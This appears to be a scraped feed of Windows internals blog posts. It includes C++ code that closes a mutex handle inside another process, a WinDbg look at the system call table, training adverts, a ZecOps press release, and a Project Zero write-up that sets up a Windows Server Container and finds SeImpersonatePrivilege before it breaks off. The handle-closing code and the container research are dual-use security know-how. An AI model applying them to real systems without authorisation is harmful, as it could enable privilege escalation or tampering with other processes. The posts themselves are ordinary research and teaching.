typedef enum _OBJECT_INFORMATION_CLASS {
	ObjectNameInformation = 1
} OBJECT_INFORMATION_CLASS;

typedef struct _UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_NAME_INFORMATION {
	UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;

extern "C" NTSTATUS NTAPI NtQueryObject(
	_In_opt_ HANDLE Handle,
	_In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
	_Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
	_In_ ULONG ObjectInformationLength,
	_Out_opt_ PULONG ReturnLength);

NtQueryObject has several information classes, but we only need the name. But what handle do we provide NtQueryObject? If we were going with option 3 above and inject code into WMP’s process, we could loop with handle values starting from 4 (the first legal handle) and incrementing the loop handle by four.

Here we are in an external process, so handing out the handles provided by NtQueryInformationProcess does not make sense. What we have to do is duplicate each handle into our own process, and then make the call. First, we set up a loop for all handles and duplicate each one:

auto info = reinterpret_cast<PROCESS_HANDLE_SNAPSHOT_INFORMATION*>(buffer.get());
for (ULONG i = 0; i < info->NumberOfHandles; i++) {
	HANDLE h = info->Handles[i].HandleValue;
	HANDLE hTarget;
	if (!::DuplicateHandle(hProcess, h, ::GetCurrentProcess(), &hTarget, 
		0, FALSE, DUPLICATE_SAME_ACCESS))
		continue;	// move to next handle
	}

We duplicate the handle from WMP’s process (hProcess) to our own process. This function requires the handle to the process opened with PROCESS_DUP_HANDLE.

Now for the name: we need to call NtQueryObject with our duplicated handle and buffer that should be filled with UNICODE_STRING and whatever characters make up the name.

BYTE nameBuffer[1 << 10];
auto status = ::NtQueryObject(hTarget, ObjectNameInformation, 
	nameBuffer, sizeof(nameBuffer), nullptr);
::CloseHandle(hTarget);
if (!NT_SUCCESS(status))
	continue;

Once we query for the name, the handle is not needed and can be closed, so we don’t leak handles in our own process. Next, we need to locate the name and compare it with our target name. But what is the target name? We see in Process Explorer how the name looks. It contains the prefix used by any process (except UWP processes): “\Sessions\<session>\BasedNameObjects\<thename>”. We need the session ID and the “real” name to build our target name:

WCHAR targetName[256];
DWORD sessionId;
::ProcessIdToSessionId(pid, &sessionId);
::swprintf_s(targetName,
	L"\\Sessions\\%u\\BaseNamedObjects\\Microsoft_WMP_70_CheckForOtherInstanceMutex", 
	sessionId);
auto len = ::wcslen(targetName);

This code should come before the loop begins, as we only need to build it once.

Not for the real comparison of names:

auto name = reinterpret_cast<UNICODE_STRING*>(nameBuffer);
if (name->Buffer && 
	::_wcsnicmp(name->Buffer, targetName, len) == 0) {
	// found it!
}

The name buffer is cast to a UNICODE_STRING, which is the standard string type in the native API (and the kernel). It has a Length member which is in bytes (not characters) and does not have to be NULL-terminated. This is why the function used is _wcsnicmp, which can be limited in its search for a match.

Assuming we find our handle, what do we do with it? Fortunately, there is a trick we can use that allows closing a handle in another process: call DuplicateHandle again, but add the DUPLICATE_CLOSE_SOURCE to close the source handle. Then close our own copy, and that’s it! The mutex is gone. Let’s do it:

// found it!
::DuplicateHandle(hProcess, h, ::GetCurrentProcess(), &hTarget,
	0, FALSE, DUPLICATE_CLOSE_SOURCE);
::CloseHandle(hTarget);
printf("Found it! and closed it!\n");
return 0;

This is it. If we get out of the loop, it means we failed to locate the handle with that name. The general technique of duplicating a handle and closing the source is applicable to kernel mode as well. It does require a process handle with PROCESS_DUP_HANDLE to make it work, which is not always possible to get from user mode. For example, protected and PPL (protected processes light) processes cannot be opened with this access mask, even by administrators. In kernel mode, on the other hand, any process can be opened with full access.

wmp1

💾

zodiacon

💾

Next Windows Internals (Remote) Training

3 January 2020 at 18:47

It’s been a while since I gave the Windows Internals training, so it’s time for another class of my favorite topics!

This time I decided to make it more afordable, to allow more people to participate. The cost is based on whether paid by an individual vs. a company. The training includes lab exercises – some involve working with tools, while others involve coding in C/C++.

  • Public 5-day remote class
  • Dates: April 20, 22, 23, 27, 30
  • Time: 8 hours / day. Exact hours TBD
  • Price: 750 USD (payed by individual) / 1500 USD (payed by company)
  • Register by emailing [email protected] and specifying “Windows Internals Training” in the title
    • Provide names of participants (discount available for multiple participants from the same company), company name (if any) and preferred time zone.
    • You’ll receive instructions for payment and other details
  • Virtual space is limited!

The training time zone will be finalized closer to the start date.

Objectives: Understand the Windows system architectureExplore the internal workings of process, threads, jobs, virtual memory, the I/O system and other mechanisms fundamental to the way Windows works

Write a simple software device driver to access/modify information not available from user mode

Target Audience: Experienced windows programmers in user mode or kernel mode, interested in writing better programs, by getting a deeper understanding of the internal mechanisms of the windows operating system.Security researchers interested in gaining a deeper understanding of Windows mechanisms (security or otherwise), allowing for more productive research
Pre-Requisites: Basic knowledge of OS concepts and architecture.Power user level working with Windows

Practical experience developing windows applications is an advantage

C/C++ knowledge is an advantage

  • Module 1: System Architecture
    • Brief Windows NT History
    • Windows Versions
    • Tools: Windows, Sysinternals, Debugging Tools for Windows
    • Processes and Threads
    • Virtual Memory
    • User mode vs. Kernel mode
    • Architecture Overview
    • Key Components
    • User/kernel transitions
    • APIs: Win32, Native, .NET, COM, WinRT
    • Objects and Handles
    • Sessions
    • Introduction to WinDbg
    • Lab: Task manager, Process Explorer, WinDbg
  • Module 2: Processes & Jobs
    • Process basics
    • Creating and terminating processes
    • Process Internals & Data Structures
    • The Loader
    • DLL explicit and implicit linking
    • Process and thread attributes
    • Protected processes and PPL
    • UWP Processes
    • Minimal and Pico processes
    • Jobs
    • Nested jobs
    • Introduction to Silos
    • Server Silos and Docker
    • Lab: viewing process and job information; creating processes; setting job limits
  • Module 3: Threads
    • Thread basics
    • Thread Internals & Data Structures
    • Creating and terminating threads
    • Thread Stacks
    • Thread Priorities
    • Thread Scheduling
    • CPU Sets
    • Direct Switch
    • Deep Freeze
    • Thread Synchronization
    • Lab: creating threads; thread synchronization; viewing thread information; CPU sets
  • Module 4: Kernel Mechanisms
    • Trap Dispatching
    • Interrupts
    • Interrupt Request Level (IRQL)
    • Deferred Procedure Calls (DPCs)
    • Exceptions
    • System Crash
    • Object Management
    • Objects and Handles
    • Sharing Objects
    • Thread Synchronization
    • Synchronization Primitives (Mutex, Semaphore, Events, and more)
    • Signaled vs. Non-Signaled
    • High IRQL Synchronization
    • Windows Global Flags
    • Kernel Event Tracing
    • Wow64
    • Lab: Viewing Handles, Interrupts; creating maximum handles; Thread synchronization
  • Module 5: Memory Management
    • Overview
    • Small, large and huge pages
    • Page states
    • Memory Counters
    • Address Space Layout
    • Address Translation Mechanisms
    • Heaps
    • APIs in User mode and Kernel mode
    • Page Faults
    • Page Files
    • Commit Size and Commit Limit
    • Workings Sets
    • Memory Mapped Files (Sections)
    • Page Frame Database
    • Other memory management features
    • Lab: committing & reserving memory; using shared memory; viewing memory related information
  • Module 6: Management Mechanisms
    • The Registry
    • Services
    • Starting and controlling services
    • Windows Management Instrumentation
    • Lab: Viewing and configuring services; Process Monitor

  • Module 7: I/O System
    • I/O System overview
    • Device Drivers
    • Plug & Play
    • The Windows Driver Model (WDM)
    • The Windows Driver Framework (WDF)
    • WDF: KMDF and UMDF
    • Device and Driver Objects
    • I/O Processing and Data Flow
    • IRPs
    • Power Management
    • Driver Verifier
    • Writing a Software Driver
    • Labs: viewing driver and device information; writing a software driver
  • Module 8: Security
    • Security Components
    • Virtualization Based Security
    • Hyper-V
    • Protecting objects
    • SIDs
    • User Access Control (UAC)
    • Tokens
    • Integrity Levels
    • ACLs
    • Privileges
    • Access checks
    • AppContainers
    • Logon
    • Control Flow Guard (CFG)
    • Process mitigations
    • Lab: viewing security information

zodiacon

💾

Where did System Services 0 and 1 go?

13 November 2019 at 16:53

System calls on Windows go through NTDLL.dll, where each system call is invoked by a syscall (x64) or sysenter (x86) CPU instruction, as can be seen from the following output of NtCreateFile from NTDLL:

0:000> u
ntdll!NtCreateFile:
00007ffc`c07fcb50 4c8bd1          mov     r10,rcx
00007ffc`c07fcb53 b855000000      mov     eax,55h
00007ffc`c07fcb58 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffc`c07fcb60 7503            jne     ntdll!NtCreateFile+0x15 (00007ffc`c07fcb65)
00007ffc`c07fcb62 0f05            syscall
00007ffc`c07fcb64 c3              ret
00007ffc`c07fcb65 cd2e            int     2Eh
00007ffc`c07fcb67 c3              ret

The important instructions are marked in bold. The value set to EAX is the system service number (0x55 in this case). The syscall instruction follows (the condition tested does not normally cause a branch). syscall causes transition to the kernel into the System Service Dispatcher routine, which is responsible for dispatching to the real system call implementation within the Executive. I will not go to the exact details here, but eventually, the EAX register must be used as a lookup index into the System Service Dispatch Table (SSDT), where each system service number (index) should point to the actual routine.

On x64 versions of Windows, the SSDT is available in the kernel debugger in the nt!KiServiceTable symbol:

lkd> dd nt!KiServiceTable
fffff804`13c3ec20  fced7204 fcf77b00 02b94a02 04747400
fffff804`13c3ec30  01cef300 fda01f00 01c06005 01c3b506
fffff804`13c3ec40  02218b05 0289df01 028bd600 01a98d00
fffff804`13c3ec50  01e31b00 01c2a200 028b7200 01cca500
fffff804`13c3ec60  02229b01 01bf9901 0296d100 01fea002

You might expect the values in the SSDT to be 64-bit pointers, pointing directly to the system services (this is the scheme used on x86 systems). On x64 the values are 32 bit, and are used as offsets from the start of the SSDT itself. However, the offset does not include the last hex digit (4 bits): this last value is the number of arguments to the system call.

Let’s see if this holds with NtCreateFile. Its service number is 0x55 as we’ve seen from user mode, so to get to the actual offset, we need to perform a simple calculation:

kd> dd nt!KiServiceTable+55*4 L1
fffff804`13c3ed74  020b9207

Now we need to take this offset (without the last hex digit), add it to the SSDT and this should point at NtCreateFile:

lkd> u nt!KiServiceTable+020b920
nt!NtCreateFile:
fffff804`13e4a540 4881ec88000000  sub     rsp,88h
fffff804`13e4a547 33c0            xor     eax,eax
fffff804`13e4a549 4889442478      mov     qword ptr [rsp+78h],rax
fffff804`13e4a54e c744247020000000 mov     dword ptr [rsp+70h],20h

Indeed – this is NtCreateFile. What about the argument count? The value stored is 7. Here is the prototype of NtCreateFile (documented in the WDK as ZwCreateFile):

NTSTATUS NtCreateFile(
  PHANDLE            FileHandle,
  ACCESS_MASK        DesiredAccess,
  POBJECT_ATTRIBUTES ObjectAttributes,
  PIO_STATUS_BLOCK   IoStatusBlock,
  PLARGE_INTEGER     AllocationSize,
  ULONG              FileAttributes,
  ULONG              ShareAccess,
  ULONG              CreateDisposition,
  ULONG              CreateOptions,
  PVOID              EaBuffer,
  ULONG              EaLength);

Clearly, there are 11 parameters, not just 7. Why the discrepency? The stored value is the number of parameters that are passed using the stack. In x64 calling convention, the first 4 arguments are passed using registers: RCX, RDX, R8, R9 (in this order).

Now back to the title of this post. Here are the first few entries in the SSDT again:

lkd> dd nt!KiServiceTable
fffff804`13c3ec20  fced7204 fcf77b00 02b94a02 04747400
fffff804`13c3ec30  01cef300 fda01f00 01c06005 01c3b506

The first two entries look different, with much larger numbers. Let’s try to apply the same logic for the first value (index 0):

kd> u nt!KiServiceTable+fced720
fffff804`2392c340 ??              ???
                    ^ Memory access error in 'u nt!KiServiceTable+fced720'

Clearly a bust. The value is in fact a negative value (in two’s complement), so we need to sign-extend it to 64 bit, and then perform the addition (leaving out the last hex digit as before):

kd> u nt!KiServiceTable+ffffffff`ffced720
nt!NtAccessCheck:
fffff804`1392c340 4c8bdc          mov     r11,rsp
fffff804`1392c343 4883ec68        sub     rsp,68h
fffff804`1392c347 488b8424a8000000 mov     rax,qword ptr [rsp+0A8h]

This is NtAccessCheck. The function’s implementation is in lower addresses than the SSDT itself. Let’s try the same exercise with index 1:

kd> u nt!KiServiceTable+ffffffff`ffcf77b0
nt!NtWorkerFactoryWorkerReady:
fffff804`139363d0 4c8bdc          mov     r11,rsp
fffff804`139363d3 49895b08        mov     qword ptr [r11+8],rbx

And we get system call number 1: NtWorkerFactoryWorkerReady.

For those fond of WinDbg scripting – write a script to display nicely all system call functions and their indices.

 

zodiacon

💾

Windows 10 Desktops vs. Sysinternals Desktops

17 February 2019 at 09:19

One of the new Windows 10 features visible to users is the support for additional “Desktops”. It’s now possible to create additional surfaces on which windows can be used. This idea is not new – it has been around in the Linux world for many years (e.g. KDE, Gnome), where users have 4 virtual desktops they can use. The idea is that to prevent clutter, one desktop can be used for web browsing, for example, and another desktop can be used for all dev work, and yet a third desktop could be used for all social / work apps (outlook, WhatsApp, Facebook, whatever).

To create an additional virtual desktop on Windows 10, click on the Task View button on the task bar, and then click the “New Desktop” button marked with a plus sign.

newvirtualdesktop

Now you can switch between desktops by clicking the appropriate desktop button and then launch apps as usual. It’s even possible (by clicking Task View again) to move windows from desktop to desktop, or to request that a window be visible on all desktops.

The Sysinternals tools had a tool called “Desktops” for many years now. It too allows for creation of up to 4 desktops where applications can be launched. The question is – is this Desktops tool the same as the Windows 10 virtual desktops feature? Not quite.

First, some background information. In the kernel object hierarchy under a session object, there are window stations, desktops and other objects. Here’s a diagram summarizing this tree-like relationship:

Sessions

As can be seen in the diagram, a session contains a set of Window Stations. One window station can be interactive, meaning it can receive user input, and is always called winsta0. If there are other window stations, they are non-interactive.

Each window station contains a set of desktops. Each of these desktops can hold windows. So at any given moment, an interactive user can interact with a single desktop under winsta0. Upon logging in, a desktop called “Default” is created and this is where all the normal windows appear. If you click Ctrl+Alt+Del for example, you’ll be transferred to another desktop, called “Winlogon”, that was created by the winlogon process. That’s why your normal windows “disappear” – you have been switched to another desktop where different windows may exist. This switching is done by a documented function – SwitchDesktop.

And here lies the difference between the Windows 10 virtual desktops and the Sysinternals desktops tool. The desktops tool actually creates desktop objects using the CreateDesktop API. In that desktop, it launches Explorer.exe so that a taskbar is created on that desktop – initially the desktop has nothing on it. How can desktops launch a process that by default creates windows in a different desktop? This is possible to do with the normal CreateProcess function by specifying the desktop name in the STARTUPINFO structure’s lpDesktop member. The format is “windowstation\desktop”. So in the desktops tool case, that’s something like “winsta0\Sysinternals Desktop 1”. How do I know the name of the Sysinternals desktop objects? Desktops can be enumerated with the EnumDesktops API. I’ve written a small tool, that enumerates window stations and desktops in the current session. Here’s a sample output when one additional desktop has been created with “desktops”:

desktops1

In the Windows 10 virtual desktops feature, no new desktops are ever created. Win32k.sys just manipulates the visibility of windows and that’s it. Can you guess why? Why doesn’t Window 10 use the CreateDesktop/SwitchDesktop APIs for its virtual desktop feature?

The reason has to do with some limitations that exist on desktop objects. For one, a window (technically a thread) that is bound to a desktop cannot be switched to another; in other words, there is no way to transfer a windows from one desktop to another. This is intentional, because desktops provide some protection. For example, hooks set with SetWindowsHookEx can only be set on the current desktop, so cannot affect other windows in other desktops. The Winlogon desktop, as another example, has a strict security descriptor that prevents non system-level users from accessing that desktop. Otherwise, that desktop could have been tampered with.

The virtual desktops in Windows 10 is not intended for security purposes, but for flexibility and convenience (security always “contradicts” convenience). That’s why it’s possible to move windows between desktops, because there is no real “moving” going on at all. From the kernel’s perspective, everything is still on the same “Default” desktop.

 

 

 

zodiacon

💾

newvirtualdesktop

💾

Sessions

💾

desktops1

💾

Next Windows Kernel Programming Remote Class

15 February 2019 at 14:53

The next public remote Windows kernel Programming class I will be delivering is scheduled for April 15 to 18. It’s going to be very similar to the first one I did at the end of January (with some slight modifications and additions).

Cost: 1950 USD. Early bird (register before March 30th): 1650 USD

I have not yet finalized the time zone the class will be “targeting”. I will update in a few weeks on that.

If you’re interested in registering, please email [email protected] with the subject “Windows Kernel Programming class” and specify your name, company (if any) and time zone. I’ll reply by providing more information.

Feel free to contact me for questions using the email or through twitter (@zodiacon).

The complete syllabus is outlined below:

Duration: 4 Days
Target Audience: Experienced windows developers, interested in developing kernel mode drivers
Objectives: ·  Understand the Windows kernel driver programming model

·  Write drivers for monitoring processes, threads, registry and some types of objects

·  Use documented kernel hooking mechanisms

·  Write basic file system mini-filter drivers

Pre Requisites: ·  At least 2 years of experience working with the Windows API

·  Basic understanding of Windows OS concepts such as processes, threads, virtual memory and DLLs

Software requirements: ·  Windows 10 Pro 64 bit (latest stable version)
·  Visual Studio 2017 + latest update
·  Windows 10 SDK (latest)
·  Windows 10 WDK (latest)
·  Virtual Machine for testing and debugging

Instructor: Pavel Yosifovich

Abstract

The cyber security industry has grown considerably in recent years, with more sophisticated attacks and consequently more defenders. To have a fighting chance against these kinds of attacks, kernel mode drivers must be employed, where nothing (at least nothing from user mode) can escape their eyes.
The course provides the foundations for the most common software device drivers that are useful not just in cyber security, but also other scenarios, where monitoring and sometimes prevention of operations is required. Participants will write real device drivers with useful features they can then modify and adapt to their particular needs.

Syllabus

  • Module 1: Windows Internals quick overview
    • Processes
    • Virtual memory
    • Threads
    • System architecture
    • User / kernel transitions
    • Introduction to WinDbg
    • Windows APIs
    • Objects and handles
    • Summary

 

  • Module 2: The I/O System
    • I/O System overview
    • Device Drivers
    • The Windows Driver Model (WDM)
    • The Kernel Mode Driver Framework (KMDF)
    • Other device driver models
    • Driver types
    • Software drivers
    • Driver and device objects
    • I/O Processing and Data Flow
    • Accessing devices
    • Asynchronous I/O
    • Summary

 

  • Module 3: Kernel programming basics
    • Setting up for Kernel Development
    • Basic Kernel types and conventions
    • C++ in a kernel driver
    • Creating a driver project
    • Building and deploying
    • The kernel API
    • Strings
    • Linked Lists
    • The DriverEntry function
    • The Unload routine
    • Installation
    • Testing
    • Debugging
    • Summary
    • Lab: deploy a driver

 

  • Module 4: Building a simple driver
    • Creating a device object
    • Exporting a device name
    • Building a driver client
    • Driver dispatch routines
    • Introduction to I/O Request Packets (IRPs)
    • Completing IRPs
    • Handling DeviceIoControl calls
    • Testing the driver
    • Debugging the driver
    • Using WinDbg with a virtual machine
    • Summary
    • Lab: open a process for any access; zero driver; debug a driver

 

  • Module 5: Kernel mechanisms
    • Interrupt Request Levels (IRQLs)
    • Deferred Procedure Calls (DPCs)
    • Dispatcher objects
    • Low IRQL Synchronization
    • Spin locks
    • Work items
    • Summary

 

  • Module 6: Process and thread monitoring
    • Motivation
    • Process creation/destruction callback
    • Specifying process creation status
    • Thread creation/destruction callback
    • Notifying user mode
    • Writing a user mode client
    • Preventing potentially malicious processes from executing
    • Summary
    • Lab: monitoring process/thread activity; prevent specific processes from running; protecting processes

 

  • Module 7: Object and registry notifications
    • Process/thread object notifications
    • Pre and post callbacks
    • Registry notifications
    • Performance considerations
    • Reporting results to user mode
    • Summary
    • Lab: protect specific process from termination; simple registry monitor

 

  • Module 8: File system mini filters
    • File system model
    • Filters vs. mini filters
    • The Filter Manager
    • Filter registration
    • Pre and Post callbacks
    • File name information
    • Contexts
    • File system operations
    • Filter to user mode communication
    • Debugging mini-filters
    • Summary
    • Labs: protect a directory from file deletion; backup file before deletion

zodiacon

💾

ZecOps Announces The Formation of Defense Advisory Board and Appoints Former Commander of Unit 8200 Ehud Scneorson as Chairman

6 April 2021 at 13:45
ZecOps Announces The Formation of Defense Advisory Board and Appoints Former Commander of Unit 8200 Ehud Scneorson as Chairman

Ehud Schneourson to provide cyberdefense expertise and tactical guidance to burgeoning mobile security startup, with additional appointments to be announced in the coming months

SAN FRANCISCO, April 1st, 2021 — ZecOps, the world’s most powerful platform to discover and analyze mobile cyber attacks, announced the formation of its international Defense Advisory Board. Ehud Schneourson, (ret.) Brigadier General and commander of Israel’s elite Unit 8200, was appointed as Chairman.

“It takes a submarine to discover other submarines, and ZecOps is the submarine we were all waiting for in the mobile security space.” said Ehud Schneourson. “Attackers used to care only about Google and Apple, but ZecOps created an entire category of problems for attackers. I’m thrilled to partner with ZecOps in their mission to protect our most sensitive assets, our mobile devices.”

“ZecOps is a true mobile EDR that is technically non-existent in the market today”, Schneourson summarized.

ZecOps’ success in the public and private sectors has been bolstered by the discovery of several advanced attacks. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others. 

ZecOps estimates that there are hundreds of sophisticated organizations targeting mobile devices, many of whom sell their exploits on the black market. This claim is supported by ZecOps Mobile Threat Intelligence, which has shown a rapid increase in the number of mobile cyberattacks in the past year.

“The number of attacks that we have discovered on mobile devices is mind blowing. I can’t wait to see what else we’ll discover in the years to come,” said Zuk Avraham, co-founder and CEO of ZecOps. “Mobile devices have become our ‘single factor of authentication’, and the most desirable target for attackers. Our Defense Advisory Board understands and appreciates the creativity needed to establish proper mobile cyberdefense. I’m thrilled to bring Ehud onboard, and am excited to partner with him and the world’s defense leaders”.

About ZecOps:

ZecOps develops the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading governments, enterprises, and individuals globally, ZecOps Mobile EDR provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.  

For more information: https://www.zecops.com 

Follow ZecOps: LinkedIn | Twitter | Facebook

ZecOps Media Contact:

[email protected]

Who Contains the Containers?

By: Ryan
1 April 2021 at 16:06

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2

USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2

 ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

 ---> Running in ac03df015872

Removing intermediate container ac03df015872

 ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

 ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

 ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

 ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image

PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName

-------  ------    -----      -----     ------     --  -- -----------

     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION

----------------

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION

-----------------

Name                                   Attributes

----                                   ----------

Mandatory Label\High Mandatory Level   Integrity, ...

Everyone                               Mandatory, ...

BUILTIN\Users                          Mandatory, ...

NT AUTHORITY\SERVICE                   Mandatory, ...

CONSOLE LOGON                          Mandatory, ...

NT AUTHORITY\Authenticated Users       Mandatory, ...

NT AUTHORITY\This Organization         Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL                                  Mandatory, ...

User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION

---------------------

Name                          Luid              Enabled

----                          ----              -------

SeChangeNotifyPrivilege       00000000-00000017 True

SeImpersonatePrivilege        00000000-0000001D True

SeCreateGlobalPrivilege       00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

